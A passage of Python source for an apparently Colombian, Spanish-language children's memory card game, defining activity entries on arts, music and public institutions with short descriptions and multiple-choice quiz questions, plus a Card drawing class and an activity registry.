self.description[6] = "de discurso, gestos,"
self.description[7] = "escenografía, música,"
self.description[8] = "sonido y espectáculo."
self.question[0] = "¿A cuál de estas ramas del"
self.question[1] = "arte pertenece el teatro?"
self.optionA[0] = "Literario"
self.optionB[0] = "Escénico"
self.optionC[0] = "Romano"
elif id == eActivityId._27_MUSICA:
self.name = "Música"
self.image = ResourceController.game_Activity27Musica
self.answer = eQuestionAnswer.ANSWER_A
self.description[0] = "La música, como toda"
self.description[1] = "manifestación artística,"
self.description[2] = "es un producto cultural."
self.description[3] = "El fin de este arte es "
self.description[4] = "suscitar una experiencia"
self.description[5] = "estética en el oyente, y"
self.description[6] = "expresar sentimientos, "
self.description[7] = "circunstancias, "
self.description[8] = "pensamientos o ideas."
self.question[0] = "¿Si quiero aprender música"
self.question[1] = "a dónde debo ir?"
self.optionA[0] = "A la Casa de la Cultura"
self.optionA[1] = "o a una academia"
self.optionB[0] = "Al coliseo o al teatro"
self.optionC[0] = "A la Alcaldía o a la"
self.optionC[1] = "Secretaría de Educación"
elif id == eActivityId._28_DANZA_FOLCLORICA:
self.name = "Danza Folclórica"
self.image = ResourceController.game_Activity28DanzaFolclorica
self.answer = eQuestionAnswer.ANSWER_B
self.description[0] = "El término Danza "
self.description[1] = "Folclórica se aplica a"
self.description[2] = "determinados bailes que "
self.description[3] = "resultan importantes "
self.description[4] = "para la cultura y la "
self.description[5] = "historia de un país."
self.question[0] = "¿Cuáles de estos son bailes"
self.question[1] = "típicos del folclor de"
self.question[2] = "Colombia?"
self.optionA[0] = "Jazz, flamenco, porro"
self.optionB[0] = "Bambuco, joropo, cumbia"
self.optionC[0] = "Bambuco, porro y contradanza"
elif id == eActivityId._29_BREAK_DANCE:
self.name = "Break Dance"
self.image = ResourceController.game_Activity29BreakDance
self.answer = eQuestionAnswer.ANSWER_B
self.description[0] = "Esta danza urbana forma"
self.description[1] = "parte de la cultura "
self.description[2] = "HipHop, cuando la "
self.description[3] = "practican hombres estos"
self.description[4] = "se hacen llamar Bboys, "
self.description[5] = "cuando la practican "
self.description[6] = "mujeres se hacen "
self.description[7] = "llamar Bgirls."
self.question[0] = "¿Cómo se hacen llamar los"
self.question[1] = "hombres que practican el"
self.question[2] = "Breakdance?"
self.optionA[0] = "Rockers"
self.optionB[0] = "Bboys"
self.optionC[0] = "Bgirls"
elif id == eActivityId._30_BALLET:
self.name = "Ballet"
self.image = ResourceController.game_Activity30Ballet
self.answer = eQuestionAnswer.ANSWER_A
self.description[0] = "Es una forma concreta"
self.description[1] = "de danza altamente"
self.description[2] = "técnica a la que"
self.description[3] = "también se le llama"
self.description[4] = "danza clásica. Esta"
self.description[5] = "expresión artística"
self.description[6] = "puede incluir: danza,"
self.description[7] = "mímica, y teatro."
self.question[0] = "¿Cuáles de estos implementos"
self.question[1] = "están en la vestimenta propia"
self.question[2] = "del ballet?"
self.optionA[0] = "Mallas, tutú y zapatillas"
self.optionB[0] = "Mallas, tutú y cintas"
self.optionC[0] = "Tutú, zapatillas y"
self.optionC[1] = "pantalones cortos"
elif id == eActivityId._31_HIP_HOP:
self.name = "Hip Hop"
self.image = ResourceController.game_Activity31HipHop
self.answer = eQuestionAnswer.ANSWER_B
self.description[0] = "El hip-hop surgió en "
self.description[1] = "Estados Unidos a "
self.description[2] = "finales de los sesenta."
self.description[3] = "Se compone de cuatro "
self.description[4] = "pilares: MC (quien "
self.description[5] = "canta), DJ (que mezcla "
self.description[6] = "la música), Breakdance "
self.description[7] = "(quien baila) y Grafiti "
self.description[8] = "(quien pinta las paredes)"
self.question[0] = "¿En qué país surgio"
self.question[1] = "el hip hop?"
self.optionA[0] = "Inglaterra"
self.optionB[0] = "Estados Unidos"
self.optionC[0] = "Africa"
elif id == eActivityId._32_FOTOGRAFIA:
self.name = "Fotografía"
self.image = ResourceController.game_Activity32Fotografia
self.answer = eQuestionAnswer.ANSWER_A
self.description[0] = "La fotografía es el arte"
self.description[1] = "y la técnica para "
self.description[2] = "obtener imágenes "
self.description[3] = "duraderas debidas a la"
self.description[4] = "acción de la luz. En la"
self.description[5] = "actualidad, lo más común"
self.description[6] = "es la fotografía digital,"
self.description[7] = "en esta se emplean "
self.description[8] = "sensores y memorias "
self.description[9] = "digitales."
self.question[0] = "¿Qué habilidades desarrollas"
self.question[1] = "cuando aprendes fotografía?"
self.optionA[0] = "Creatividad y observación"
self.optionB[0] = "Agilidad con las manos"
self.optionC[0] = "Planear y organizar"
elif id == eActivityId._33_CANTO:
self.name = "Canto"
self.image = ResourceController.game_Activity33Canto
self.answer = eQuestionAnswer.ANSWER_B
self.description[0] = "El canto es la emisión"
self.description[1] = "controlada de sonidos de"
self.description[2] = "la voz humana, siguiendo"
self.description[3] = "una composición musical."
self.question[0] = "¿Cuál de los siguientes"
self.question[1] = "elementos sirve para escuchar"
self.question[2] = "más fuertemente el canto de"
self.question[3] = "una persona?"
self.optionA[0] = "Luces"
self.optionB[0] = "Micrófono"
self.optionC[0] = "Sintetizador"
elif id == eActivityId._34_DIBUJO_ARTISTICO:
self.name = "Dibujo Artístico"
self.image = ResourceController.game_Activity34DibujoArtistico
self.answer = eQuestionAnswer.ANSWER_C
self.description[0] = "Se requieren aptitudes "
self.description[1] = "personales y naturales"
self.description[2] = "para realizar dibujos "
self.description[3] = "artísticos. A través de"
self.description[4] = "ellos el artista expresa"
self.description[5] = "su manera de ver la "
self.description[6] = "realidad."
self.question[0] = "¿Cuáles elementos necesitas"
self.question[1] = "para realizar dibujo artístico?"
self.optionA[0] = "Compás, reglas y papeles"
self.optionB[0] = "Compás, pegante y lápices"
self.optionC[0] = "Carboncillos, papeles,"
self.optionC[1] = "borradores"
elif id == eActivityId._35_CERAMICA:
self.name = "Cerámica"
self.image = ResourceController.game_Activity35Ceramica
self.answer = eQuestionAnswer.ANSWER_B
self.description[0] = "La ceramica es el arte "
self.description[1] = "de fabricar recipientes,"
self.description[2] = "vasijas y otros objetos"
self.description[3] = "de arcilla, u otro "
self.description[4] = "material cerámico."
self.question[0] = "¿Qué elemento se necesita para"
self.question[1] = "fabricar objetos en arcilla?"
self.optionA[0] = "Luz"
self.optionB[0] = "Calor"
self.optionC[0] = "Viento"
elif id == eActivityId._36_ACUARELA:
self.name = "Acuarela"
self.image = ResourceController.game_Activity36Acuarela
self.answer = eQuestionAnswer.ANSWER_C
self.description[0] = "La acuarela es una "
self.description[1] = "pintura sobre papel o"
self.description[2] = "cartulina con colores"
self.description[3] = "diluidos en agua. Los"
self.description[4] = "colores utilizados son"
self.description[5] = "transparentes (según la"
self.description[6] = "cantidad de agua en la "
self.description[7] = "mezcla) y a veces dejan"
self.description[8] = "ver el fondo del papel "
self.description[9] = "(blanco)."
self.question[0] = "Para modificar el color de"
self.question[1] = "la acuarela necesitas:"
self.optionA[0] = "Trementina y color blanco"
self.optionB[0] = "Agua y trementina"
self.optionC[0] = "Agua y pinceles"
elif id == eActivityId._37_REALIZACION_AUDIOVISUAL:
self.name = "Realización Audiovisual"
self.image = ResourceController.game_Activity37RealizacionAudiovisual
self.answer = eQuestionAnswer.ANSWER_B
self.description[0] = "Es todo el proceso "
self.description[1] = "mediante el cuál se "
self.description[2] = "realizan producciones"
self.description[3] = "audiovisuales (que son"
self.description[4] = "las que se ven y se oyen)"
self.description[5] = "como programas de"
self.description[6] = "televisión."
self.question[0] = "¿Cuál de los siguientes es otro"
self.question[1] = "ejemplo de producción"
self.question[2] = "audiovisual?"
self.optionA[0] = "Una canción"
self.optionB[0] = "Una película"
self.optionC[0] = "Un dibujo"
elif id == eActivityId._38_CREACION_NARRATIVA:
self.name = "Creación Narrativa"
self.image = ResourceController.game_Activity38CreacionNarrativa
self.answer = eQuestionAnswer.ANSWER_B
self.description[0] = "La creación narrativa es"
self.description[1] = "el arte de inventar "
self.description[2] = "historias y cuentos, "
self.description[3] = "puedes hacerlo solo o"
self.description[4] = "con otras personas."
self.question[0] = "¿La creación narrativa es"
self.question[1] = "el arte de inventar?"
self.optionA[0] = "Dibujos"
self.optionB[0] = "Historias y cuentos"
self.optionC[0] = "Canciones"
elif id == eActivityId._39_POESIA_Y_DECLAMACION:
self.name = "Poesía y Declamación"
self.image = ResourceController.game_Activity39PoesiaYDeclamacion
self.answer = eQuestionAnswer.ANSWER_B
self.description[0] = "No todos los poetas se"
self.description[1] = "dedicaron a escribir "
self.description[2] = "poemas para adultos, "
self.description[3] = "algunos escribian "
self.description[4] = "también para niños."
self.question[0] = "¿Cuál de los siguientes"
self.question[1] = "personajes es un famoso"
self.question[2] = "poeta infantil?"
self.optionA[0] = "Mario Benedetti"
self.optionB[0] = "Rafael Pombo"
self.optionC[0] = "Pablo Neruda"
elif id == eActivityId._40_BANDA_MARCIAL:
self.name = "Banda Marcial"
self.image = ResourceController.game_Activity40BandaMarcial
self.answer = eQuestionAnswer.ANSWER_A
self.description[0] = "Una banda marcial se "
self.description[1] = "compone de un grupo de"
self.description[2] = "musicos que marchando"
self.description[3] = "tocan diferentes "
self.description[4] = "instrumentos y que"
self.description[5] = "generalmente se "
self.description[6] = "presentan en vivo y al "
self.description[7] = "aire libre."
self.question[0] = "¿En una banda marcial,"
self.question[1] = "los músicos van?"
self.optionA[0] = "Marchando"
self.optionB[0] = "Corriendo"
self.optionC[0] = "Hablando"
elif id == eActivityId._41_MUSICA_ANDINA:
self.name = "Música Andina"
self.image = ResourceController.game_Activity41MusicaAndina
self.answer = eQuestionAnswer.ANSWER_B
self.description[0] = "Música andina es un "
self.description[1] = "término que se aplica a"
self.description[2] = "diversos generos "
self.description[3] = "músicales originados en"
self.description[4] = "los Andes sudamericanos,"
self.description[5] = "particularmente en Perú."
self.question[0] = "¿Música andina es un término"
self.question[1] = "que se aplica a diversos"
self.question[2] = "generos músicales originados"
self.question[3] = "en?"
self.optionA[0] = "Europa"
self.optionB[0] = "Los Andes sudamericanos"
self.optionC[0] = "Asia"
elif id == eActivityId._42_GUITARRA:
self.name = "Guitarra"
self.image = ResourceController.game_Activity42Guitarra
self.answer = eQuestionAnswer.ANSWER_C
self.description[0] = "Es un instrumento "
self.description[1] = "músical de seis cuerdas,"
self.description[2] = "utilizado en la música"
self.description[3] = "colombiana y en ritmos "
self.description[4] = "como el rock, el "
self.description[5] = "flamenco y la música de"
self.description[6] = "cantautor."
self.question[0] = "¿Cuántas cuerdas tiene"
self.question[1] = "una guitarra?"
self.optionA[0] = "Siete"
self.optionB[0] = "Cinco"
self.optionC[0] = "Seis"
elif id == eActivityId._43_TITERES:
self.name = "Títeres"
self.image = ResourceController.game_Activity43Titeres
self.answer = eQuestionAnswer.ANSWER_B
self.description[0] = "Actividad artística que"
self.description[1] = "consiste en la"
self.description[2] = "manipulación de muñecos"
self.description[3] = "en escenarios decorados"
self.description[4] = "con cortinas."
self.question[0] = "¿Los títeres también se"
self.question[1] = "conocen cómo?"
self.optionA[0] = "Teatro de muñecos"
self.optionB[0] = "Teatro de marionetas"
self.optionC[0] = "Teatro para niños"
elif id == eActivityId._44_FLAUTAS:
self.name = "Flautas"
self.image = ResourceController.game_Activity44Flautas
self.answer = eQuestionAnswer.ANSWER_A
self.description[0] = "Es un instrumento"
self.description[1] = "músical de viento,"
self.description[2] = "que tiene una serie de"
self.description[3] = "orificios y una"
self.description[4] = "boquilla."
self.question[0] = "Algunos tipos de flautas"
self.question[1] = "son:"
self.optionA[0] = "Traversa, dulce, ocarina"
self.optionB[0] = "Larga, corta, traversa"
self.optionC[0] = "Ocarina, larga, quena"
elif id == eActivityId._45_CLUB_DE_LECTURA:
self.name = "Club de lectura"
self.image = ResourceController.game_Activity45ClubDeLectura
self.answer = eQuestionAnswer.ANSWER_C
self.description[0] = "En el club de lectura "
self.description[1] = "las personas se reunen a"
self.description[2] = "leer cuentos e historias."
self.question[0] = "Si quieres participar en un"
self.question[1] = "club de lectura puedes ir a:"
self.optionA[0] = "El teatro"
self.optionB[0] = "El coliseo"
self.optionC[0] = "La Casa de la Cultura"
elif id == eActivityId._46_GRUPO_DE_ROCK:
self.name = "Grupo de Rock"
self.image = ResourceController.game_Activity46GrupoDeRock
self.answer = eQuestionAnswer.ANSWER_B
self.description[0] = "El rock es un genero"
self.description[1] = "músical del siglo XX"
self.description[2] = "que se originó en"
self.description[3] = "Estados Unidos. Su"
self.description[4] = "sonido se basa"
self.description[5] = "principalmente en la"
self.description[6] = "guitarra eléctrica."
self.question[0] = "¿Además de la guitarra cuáles"
self.question[1] = "de los siguientes instrumentos"
self.question[2] = "se utilizan en un grupo de rock?"
self.optionA[0] = "La flauta y el piano"
self.optionB[0] = "La batería y el bajo eléctrico"
self.optionC[0] = "El violin y el piano"
elif id == eActivityId._47_BANDA_SINFONICA:
self.name = "Banda Sinfónica"
self.image = ResourceController.game_Activity47BandaSinfonica
self.answer = eQuestionAnswer.ANSWER_B
self.description[0] = "Una banda sinfónica está"
self.description[1] = "compuesta por "
self.description[2] = "instrumentos de viento y"
self.description[3] = "percusión, y también, "
self.description[4] = "por algunos instrumentos"
self.description[5] = "de cuerda, como el "
self.description[6] = "violonchelo, el "
self.description[7] = "contrabajo, el piano "
self.description[8] = "y el arpa."
self.question[0] = "Cuando en una banda se usan"
self.question[1] = "instrumentos de viento y percusión,"
self.question[2] = "y además instrumentos de cuerda,"
self.question[3] = "esta se llama:"
self.optionA[0] = "Banda de música"
self.optionB[0] = "Banda sinfónica"
self.optionC[0] = "Banda popular"
elif id == eActivityId._48_GAITAS_Y_TAMBORES:
self.name = "Gaitas y Tambores"
self.image = ResourceController.game_Activity48GaitasYTambores
self.answer = eQuestionAnswer.ANSWER_A
self.description[0] = "La gaita es un"
self.description[1] = "instrumento musical de"
self.description[2] = "viento. El tambor es un"
self.description[3] = "instrumento de"
self.description[4] = "percusión. La unión de"
self.description[5] = "estos dos instrumentos"
self.description[6] = "permite interpretar"
self.description[7] = "música del Caribe"
self.description[8] = "colombiano."
self.question[0] = "¿Cuál de los siguientes grupos"
self.question[1] = "colombianos es famoso por"
self.question[2] = "interpretar gaitas y tambores?"
self.optionA[0] = "Los Gaiteros de San Jacinto"
self.optionB[0] = "Los corraleros de Majagual"
self.optionC[0] = "Lucho Bermúdez y su orquesta"
elif id == eActivityId._49_MUSICA_CARRANGUERA:
self.name = "Música Carranguera"
self.image = ResourceController.game_Activity49MusicaCarranguera
self.answer = eQuestionAnswer.ANSWER_B
self.description[0] = "Es un tipo de música"
self.description[1] = "folclórica colombiana"
self.description[2] = "que nació en la región"
self.description[3] = "andina. Uno de los"
self.description[4] = "grupos más"
self.description[5] = "representativos de este"
self.description[6] = "género musical es Los"
self.description[7] = "Carrangueros de Ráquira"
self.question[0] = "¿Cuál de los siguientes cantantes"
self.question[1] = " es famoso por interpretar"
self.question[2] = "música carranguera?"
self.optionA[0] = "Pipe Peláez"
self.optionB[0] = "Jorge Veloza"
self.optionC[0] = "Darío Gómez"
elif id == eActivityId._50_PIANO:
self.name = "Piano"
self.image = ResourceController.game_Activity50Piano
self.answer = eQuestionAnswer.ANSWER_C
self.description[0] = "El piano es un "
self.description[1] = "instrumento musical"
self.description[2] = "clasificado como "
self.description[3] = "instrumento de teclado "
self.description[4] = "de cuerdas percutidas."
self.description[5] = "Es muy utilizado en "
self.description[6] = "hermosas melodias de "
self.description[7] = "música clásica."
self.question[0] = "Los siguientes son los dos"
self.question[1] = "colores de las teclas del"
self.question[2] = "piano:"
self.optionA[0] = "Negro y azul"
self.optionB[0] = "Blanco y gris metalizado"
self.optionC[0] = "Blanco y negro"
elif id == eActivityId._51_INSTITUTO_COLOMBIANO_DE_BIENESTAR_FAMILIAR:
self.name = "Instituto Colombiano de Bienestar Familiar (ICBF)"
self.nameToShow1 = "Instituto colombiano de"
self.nameToShow2 = "bienestar familiar (ICBF)"
self.image = ResourceController.game_Activity51InstitutoColombianoDeBienestarFamiliar
self.answer = eQuestionAnswer.ANSWER_B
self.description[0] = "El ICBF trabaja por el "
self.description[1] = "desarrollo y la "
self.description[2] = "protección integral de "
self.description[3] = "la primera infancia, la"
self.description[4] = "niñez, la adolescencia y"
self.description[5] = "el bienestar de las "
self.description[6] = "familias colombianas. "
self.description[7] = "Se puede acudir a esta"
self.description[8] = "institución cuando un niño,"
self.description[9] = "niña o adolescente esté"
self.description[10] = "siendo abusado física,"
self.description[11] = "laboral o sexualmente."
self.question[0] = "¿Por qué trabaja el ICBF?"
self.optionA[0] = "Para generar ingresos"
self.optionB[0] = "Para el desarrollo y la"
self.optionB[1] = "protección de las familias"
self.optionC[0] = "Para la seguridad de"
self.optionC[1] = "los municipios"
elif id == eActivityId._52_POLICIA_NACIONAL:
self.name = "Policía Nacional"
self.image = ResourceController.game_Activity52PoliciaNacional
self.answer = eQuestionAnswer.ANSWER_B
self.description[0] = "La Policía Nacional"
self.description[1] = "mantiene las condiciones"
self.description[2] = "necesarias para el"
self.description[3] = "ejercicio de los"
self.description[4] = "derechos y libertades"
self.description[5] = "públicas, y para"
self.description[6] = "asegurar que Colombia"
self.description[7] = "viva en paz. Se puede"
self.description[8] = "acudir a ella cuando"
self.description[9] = "una persona está siendo"
self.description[10] = "sometida a maltrato"
self.description[11] = "físico o verbal."
self.question[0] = "¿Cuándo se debe acudir"
self.question[1] = "a la policía?"
self.optionA[0] = "Si una persona no pagó"
self.optionA[1] = "una deuda"
self.optionB[0] = "Si una persona le está"
self.optionB[1] = "haciendo daño a otra"
self.optionC[0] = "Si a una persona se le"
self.optionC[1] = "está incendiando su casa"
elif id == eActivityId._53_COMISARIA_DE_FAMILIA:
self.name = "Comisaría de Familia"
self.image = ResourceController.game_Activity53ComisariaDeFamilia
self.answer = eQuestionAnswer.ANSWER_B
self.description[0] = "Es una entidad que ayuda"
self.description[1] = "orienta a las familias,"
self.description[2] = "las ayuda a reflexionar"
self.description[3] = "y a establecer acuerdos"
self.description[4] = "cuando tienen"
self.description[5] = "dificultades. Busca que"
self.description[6] = "los derechos de todos"
self.description[7] = "los miembros de la"
self.description[8] = "familia sean reconocidos"
self.description[9] = "y respetados."
self.question[0] = "¿En cuál de estas situaciones"
self.question[1] = "un niño o una familia puede"
self.question[2] = "acudir a la comisaría de"
self.question[3] = "familia?"
self.optionA[0] = "Cuando uno de los miembros de la"
self.optionA[1] = "familia tiene problemas de salud"
self.optionB[0] = "Cuando los padres maltratan a sus hijos"
self.optionB[1] = "o cuando los padres se golpean"
self.optionC[0] = "Cuando un miembro de la"
self.optionC[1] = "familia está perdido"
elif id == eActivityId._54_CASA_DE_LA_JUSTICIA:
self.name = "Casa de la Justicia"
self.image = ResourceController.game_Activity54CasaDeLaJusticia
self.answer = eQuestionAnswer.ANSWER_C
self.description[0] = "La casa de justicia fue "
self.description[1] = "creada para asesorar, "
self.description[2] = "apoyar y fortalecer la "
self.description[3] = "gestión de las "
self.description[4] = "autoridades "
self.description[5] = "territoriales, con el"
self.description[6] = "objetivo de garantizar "
self.description[7] = "el derecho del acceso a"
self.description[8] = "la justicia de todos los"
self.description[9] = "ciudadanos."
self.question[0] = "¿Qué derecho garantizan las"
self.question[1] = "casas de justicia?"
self.optionA[0] = "El derecho a la salud"
self.optionB[0] = "El derecho a la vivienda"
self.optionC[0] = "El derecho a la justicia"
elif id == eActivityId._55_ALCALDIA:
self.name = "Alcaldía"
self.image = ResourceController.game_Activity55Alcaldia
self.answer = eQuestionAnswer.ANSWER_B
self.description[0] = "Desde allí se ejerce la "
self.description[1] = "administración política "
self.description[2] = "de una ciudad, municipio"
self.description[3] = "o pueblo, en nuestro "
self.description[4] = "país quien ejerce esta"
self.description[5] = "función se denomina "
self.description[6] = "Alcalde y es elegido a "
self.description[7] = "través del voto."
self.question[0] = "La máxima autoridad de un"
self.question[1] = "municipio se llama:"
self.optionA[0] = "Edil"
self.optionB[0] = "Alcalde"
self.optionC[0] = "Concejal"
elif id == eActivityId._56_SERVICIO_NACIONAL_DE_APRENDIZAJE:
self.name = "Servicio Nacional de Aprendizaje (SENA)"
self.nameToShow1 = "Servicio nacional de"
self.nameToShow2 = "aprendizaje (SENA)"
self.image = ResourceController.game_Activity56ServicioNacionalDeAprendizaje
self.answer = eQuestionAnswer.ANSWER_B
self.description[0] = "El SENA ofrece formación"
self.description[1] = "profesional para jóvenes"
self.description[2] = "y adultos en actividades"
self.description[3] = "productivas que les"
self.description[4] = "permiten conseguir"
self.description[5] = "empleo o formar su"
self.description[6] = "propia empresa."
self.question[0] = "¿Qué ofrece el SENA?"
self.optionA[0] = "Clases de baile"
self.optionB[0] = "Formación profesional"
self.optionB[1] = "para jóvenes y adultos"
self.optionC[0] = "Servicios de salud"
elif id == eActivityId._57_CASA_DE_LA_CULTURA:
self.name = "Casa de la Cultura"
self.image = ResourceController.game_Activity57CasaDeLaCultura
self.answer = eQuestionAnswer.ANSWER_B
self.description[0] = "Las Casa de la Cultura"
self.description[1] = "tiene como objetivo"
self.description[2] = "brindar un espacio"
self.description[3] = "permanente para que"
self.description[4] = "todas las personas"
self.description[5] = "accedan a las"
self.description[6] = "diferentes"
self.description[7] = "manifestaciones del"
self.description[8] = "arte, la cultura y el"
self.description[9] = "patrimonio."
self.question[0] = "¿Cuál es el objetivo de la"
self.question[1] = "casa de la cultura?"
self.optionA[0] = "Brindar un espacio"
self.optionA[1] = "para la relajación"
self.optionB[0] = "Brindar un espacio para las"
self.optionB[1] = "manifestaciones culturales"
self.optionC[0] = "Dar clases para manejar"
self.optionC[1] = "computadores"
elif id == eActivityId._58_INSTITUTO_MUNICIPAL_DE_RECREACION_Y_DEPORTE:
self.name = "Instituto Municipal de Recreación y Deporte (IMRD)"
self.nameToShow1 = "Instituto municipal de"
self.nameToShow2 = "recreación y deporte"
self.image = ResourceController.game_Activity58InstitutoMunicipalDeRecreacionYDeport
self.answer = eQuestionAnswer.ANSWER_C
self.description[0] = "El IMRD promueve el "
self.description[1] = "ejercicio y goce pleno"
self.description[2] = "del derecho al deporte,"
self.description[3] = "la recreación, la "
self.description[4] = "actividad física, el "
self.description[5] = "aprovechamiento del "
self.description[6] = "tiempo libre y el buen"
self.description[7] = "uso de parques y "
self.description[8] = "escenarios para todos"
self.description[9] = "los ciudadanos."
self.question[0] = "¿Qué opciones le puede ofrecer"
self.question[1] = "el IMRD a una persona que quiera"
self.question[1] = "usar bien su tiempo libre?"
self.optionA[0] = "Conocer los mejores"
self.optionA[1] = "programas de televisión"
self.optionB[0] = "Informa las películas que"
self.optionB[1] = "hay en cartelera"
self.optionC[0] = "Actividades culturales, deportes y"
self.optionC[1] = "espectáculos para diferentes edades"
elif id == eActivityId._59_HOSPITAL:
self.name = "Hospital"
self.image = ResourceController.game_Activity59Hospital
self.answer = eQuestionAnswer.ANSWER_B
self.description[0] = "Un hospital es un"
self.description[1] = "lugar donde se atiende"
self.description[2] = "a los enfermos para"
self.description[3] = "diagnosticar su"
self.description[4] = "enfermedad y brindarles"
self.description[5] = "el tratamiento que"
self.description[6] = "necesitan."
self.question[0] = "¿A quién se atiende"
self.question[1] = "en un hospital?"
self.optionA[0] = "A los artistas"
self.optionB[0] = "A los enfermos"
self.optionC[0] = "A los deportistas"
elif id == eActivityId._60_CASA_UNIDOS:
self.name = "Casa UNIDOS"
self.image = ResourceController.game_Activity60CasaUnidos
self.answer = eQuestionAnswer.ANSWER_C
self.description[0] = "Es un lugar de encuentro"
self.description[1] = "para las familias que"
self.description[2] = "pertenecen a la"
self.description[3] = "estrategia UNIDOS, en el"
self.description[4] = "que pueden hablar con"
self.description[5] = "los cogestores y a la"
self.description[6] = "vez que enterarse de las"
self.description[7] = "ofertas que existen en"
self.description[8] = "el municipio para"
self.description[9] = "atender las"
self.description[10]= "necesidades de la"
self.description[11]= "población."
self.question[0] = "¿Quiénes asisten a la"
self.question[1] = "casa UNIDOS?"
self.optionA[0] = "Los niños y jóvenes"
self.optionA[1] = "en general"
self.optionB[0] = "Los deportistas"
self.optionC[0] = "Las familias UNIDOS"
elif id == eActivityId._61_COMODIN:
self.name = "Comodin Estrella"
self.image = ResourceController.game_Activity61Comodin
self.answer = eQuestionAnswer.ANSWER_A
self.description[0] = "Es un espacio de "
self.description[1] = "encuentro para las "
self.description[2] = "familias que pertenecen"
self.description[3] = "a la estrategia UNIDOS,"
self.description[4] = "en el que pueden "
self.description[5] = "interactuar con los "
self.description[6] = "cogestores, a la vez que"
self.description[7] = "enterarse de las ofertas"
self.description[8] = "que existen en el "
self.description[9] = "municipio para las "
self.description[10] = "necesidades de la "
self.description[11] = "población."
self.question[0] = ""
self.question[1] = ""
self.optionA[0] = ""
self.optionB[0] = ""
self.optionC[0] = ""
class Card:
    """One memory-game card tied to an activity, drawn face up or face down."""

    def __init__(self, activityId, indexes):
        """Place the card on the board grid and load its face image.

        activityId -- key into InformationActivities.allActivities
        indexes    -- (row, column) pair giving the card's grid cell
        """
        row, column = indexes
        # Grid origin and horizontal spacing depend on the difficulty:
        # easier boards have fewer columns, so the grid is shifted right.
        self.__xPos = 0
        self.__yPos = 0
        difficulty = GlobalsController.GAME_DIFFICULTY
        if difficulty == eGameDifficulty.EASY:
            self.__xPos = 190 + (170 * column)
            self.__yPos = 120 + (175 * row)
        elif difficulty == eGameDifficulty.NORMAL:
            self.__xPos = 110 + (170 * column)
            self.__yPos = 120 + (175 * row)
        elif difficulty == eGameDifficulty.HARD:
            self.__xPos = 10 + (148 * column)
            self.__yPos = 120 + (175 * row)
        # Identification and face-up/face-down state.
        self.activityId = activityId
        self.__isOpen = False
        self.__image = InformationActivities.allActivities[self.activityId].image

    def doPaint(self, displaySurface):
        """Blit the card at its position: face image if open, card back otherwise."""
        if self.__isOpen:
            displaySurface.blit(ResourceController.game_CardOpen, (self.__xPos, self.__yPos))
            displaySurface.blit(self.__image, (self.__xPos, self.__yPos))
        else:
            displaySurface.blit(ResourceController.game_CardClose, (self.__xPos, self.__yPos))

    def isOpen(self):
        """Return True when the card is currently face up."""
        return self.__isOpen

    def flipToShow(self):
        """Turn the card face up."""
        self.__isOpen = True

    def flipToHide(self):
        """Turn the card face down."""
        self.__isOpen = False
class InformationActivities:
    """Registry holding one shared Activity instance per eActivityId."""
    # ----------------------------
    # Unique instances, one per activity id
    # ----------------------------
    act01 = Activity(eActivityId._01_BICICROS)
    act02 = Activity(eActivityId._02_PATINAJE)
    act03 = Activity(eActivityId._03_FUTSAL)
    act04 = Activity(eActivityId._04_FUTBOL)
    act05 = Activity(eActivityId._05_PORRISMO)
    act06 = Activity(eActivityId._06_ATLETISMO)
    act07 = Activity(eActivityId._07_BALONCESTO)
    act08 = Activity(eActivityId._08_KARATE_DO)
    act09 = Activity(eActivityId._09_LEVANTAMIENTO_DE_PESAS)
    act10 = Activity(eActivityId._10_TAEKWON_DO)
    act11 = Activity(eActivityId._11_BADMINTON)
    act12 = Activity(eActivityId._12_TENIS_DE_MESA)
    act13 = Activity(eActivityId._13_ESGRIMA)
    act14 = Activity(eActivityId._14_GIMNASIA_ARTISTICA)
    act15 = Activity(eActivityId._15_AJEDREZ)
    act16 = Activity(eActivityId._16_AEROBICOS)
    act17 = Activity(eActivityId._17_NATACION)
    act18 = Activity(eActivityId._18_BOXEO)
    act19 = Activity(eActivityId._19_EQUITACION)
    act20 = Activity(eActivityId._20_GOLF)
    act21 = Activity(eActivityId._21_JUDO)
    act22 = Activity(eActivityId._22_RUGBY)
    act23 = Activity(eActivityId._23_TENIS)
    act24 = Activity(eActivityId._24_VOLEIBOL)
    act25 = Activity(eActivityId._25_HOCKEY)
    act26 = Activity(eActivityId._26_TEATRO)
    act27 = Activity(eActivityId._27_MUSICA)
    act28 = Activity(eActivityId._28_DANZA_FOLCLORICA)
    act29 = Activity(eActivityId._29_BREAK_DANCE)
    act30 = Activity(eActivityId._30_BALLET)
    act31 = Activity(eActivityId._31_HIP_HOP)
    act32 = Activity(eActivityId._32_FOTOGRAFIA)
    act33 = Activity(eActivityId._33_CANTO)
    act34 = Activity(eActivityId._34_DIBUJO_ARTISTICO)
    act35 = Activity(eActivityId._35_CERAMICA)
    act36 = Activity(eActivityId._36_ACUARELA)
    act37 = Activity(eActivityId._37_REALIZACION_AUDIOVISUAL)
    act38 = Activity(eActivityId._38_CREACION_NARRATIVA)
    act39 = Activity(eActivityId._39_POESIA_Y_DECLAMACION)
    act40 = Activity(eActivityId._40_BANDA_MARCIAL)
    act41 = Activity(eActivityId._41_MUSICA_ANDINA)
    act42 = Activity(eActivityId._42_GUITARRA)
    act43 = Activity(eActivityId._43_TITERES)
    act44 = Activity(eActivityId._44_FLAUTAS)
    act45 = Activity(eActivityId._45_CLUB_DE_LECTURA)
    act46 = Activity(eActivityId._46_GRUPO_DE_ROCK)
    act47 = Activity(eActivityId._47_BANDA_SINFONICA)
    act48 = Activity(eActivityId._48_GAITAS_Y_TAMBORES)
    act49 = Activity(eActivityId._49_MUSICA_CARRANGUERA)
    act50 = Activity(eActivityId._50_PIANO)
    act51 = Activity(eActivityId._51_INSTITUTO_COLOMBIANO_DE_BIENESTAR_FAMILIAR)
    act52 = Activity(eActivityId._52_POLICIA_NACIONAL)
    act53 = Activity(eActivityId._53_COMISARIA_DE_FAMILIA)
    act54 = Activity(eActivityId._54_CASA_DE_LA_JUSTICIA)
    act55 = Activity(eActivityId._55_ALCALDIA)
    act56 = Activity(eActivityId._56_SERVICIO_NACIONAL_DE_APRENDIZAJE)
    act57 = Activity(eActivityId._57_CASA_DE_LA_CULTURA)
    act58 = Activity(eActivityId._58_INSTITUTO_MUNICIPAL_DE_RECREACION_Y_DEPORTE)
    act59 = Activity(eActivityId._59_HOSPITAL)
    act60 = Activity(eActivityId._60_CASA_UNIDOS)
    act61 = Activity(eActivityId._61_COMODIN)
    # ----------------------------
    # Lookup table: eActivityId -> Activity (same order as the ids above)
    # ----------------------------
    allActivities = {
        eActivityId._01_BICICROS: act01,
